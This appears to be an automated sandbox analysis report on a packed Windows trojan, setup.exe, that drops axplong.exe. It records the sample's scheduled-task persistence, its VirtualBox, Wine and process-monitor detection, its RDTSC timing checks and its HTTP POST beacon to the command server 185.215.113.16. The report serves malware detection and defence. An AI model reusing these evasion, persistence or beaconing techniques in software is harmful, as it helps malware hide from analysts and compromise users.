Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 4_2_0050BD60 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile,

4_2_0050BD60

Source: global traffic

DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.2
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.1
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000004.00000002.3321500762.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php#
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php$
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php-
Source: axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php6
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php7
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php8
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpH
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpHead
Source: axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpIG
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpP
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpT
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpW
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpX
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php_
Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpcoded
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpd
Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpeGk
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedi
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpp
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phps
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpw
Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=E?

System Summary

PE file contains section with special chars

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_0050E440	4_2_0050E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_00543068	4_2_00543068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_00504CF0	4_2_00504CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_00537D83	4_2_00537D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_0054765B	4_2_0054765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_00504AF0	4_2_00504AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_0054777B	4_2_0054777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_00546F09	4_2_00546F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_00548720	4_2_00548720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 4_2_00542BD0	4_2_00542BD0

Source: setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: setup.exe	Static PE information: Section: ZLIB complexity 0.9974508259536785
Source: setup.exe	Static PE information: Section: aosdyjib ZLIB complexity 0.9943002053730018
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9974508259536785
Source: axplong.exe.0.dr	Static PE information: Section: aosdyjib ZLIB complexity 0.9943002053730018

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@1/1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: setup.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\user\Desktop\setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: setup.exe

Static file information: File size 1933312 > 1048576

Source: setup.exe

Static PE information: Raw size of aosdyjib is bigger than: 0x100000 < 0x1a6400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\setup.exe	Unpacked PE file: 0.2.setup.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 4.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1d8aa2 should be: 0x1dafb5
Source: setup.exe	Static PE information: real checksum: 0x1d8aa2 should be: 0x1dafb5

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: aosdyjib
Source: setup.exe	Static PE information: section name: ttauocqi
Source: setup.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: aosdyjib
Source: axplong.exe.0.dr	Static PE information: section name: ttauocqi
Source: axplong.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 4_2_0051D84C push ecx; ret

4_2_0051D85F

Source: setup.exe	Static PE information: section name: entropy: 7.982355367742593
Source: setup.exe	Static PE information: section name: aosdyjib entropy: 7.955301660952693
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.982355367742593
Source: axplong.exe.0.dr	Static PE information: section name: aosdyjib entropy: 7.955301660952693

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 1FEA45 second address: 1FEA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 1FEA49 second address: 1FEA5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F47D8E4826Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 1FEA5F second address: 1FEA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 37BAA0 second address: 37BAC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48277h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 38115F second address: 381165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 381165 second address: 381172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F47D8E4826Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 37BA7D second address: 37BAA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F47D8E3B0A6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 383116 second address: 38311A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 38311A second address: 383124 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 383124 second address: 383129 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 383129 second address: 38317C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F47D8E3B0B8h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F47D8E3B0ADh 0x00000016 mov eax, dword ptr [eax] 0x00000018 push ecx 0x00000019 jnl 00007F47D8E3B0B0h 0x0000001f jmp 00007F47D8E3B0AAh 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b je 00007F47D8E3B0A8h 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 383228 second address: 383231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 383231 second address: 383235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 383235 second address: 383272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 19527DC1h 0x0000000e mov di, 1A5Dh 0x00000012 push 00000003h 0x00000014 ja 00007F47D8E4826Ch 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D1AA4h], esi 0x00000022 push 00000003h 0x00000024 mov si, 955Ch 0x00000028 mov esi, 0D0CE35Fh 0x0000002d push D018154Eh 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 rdtsc
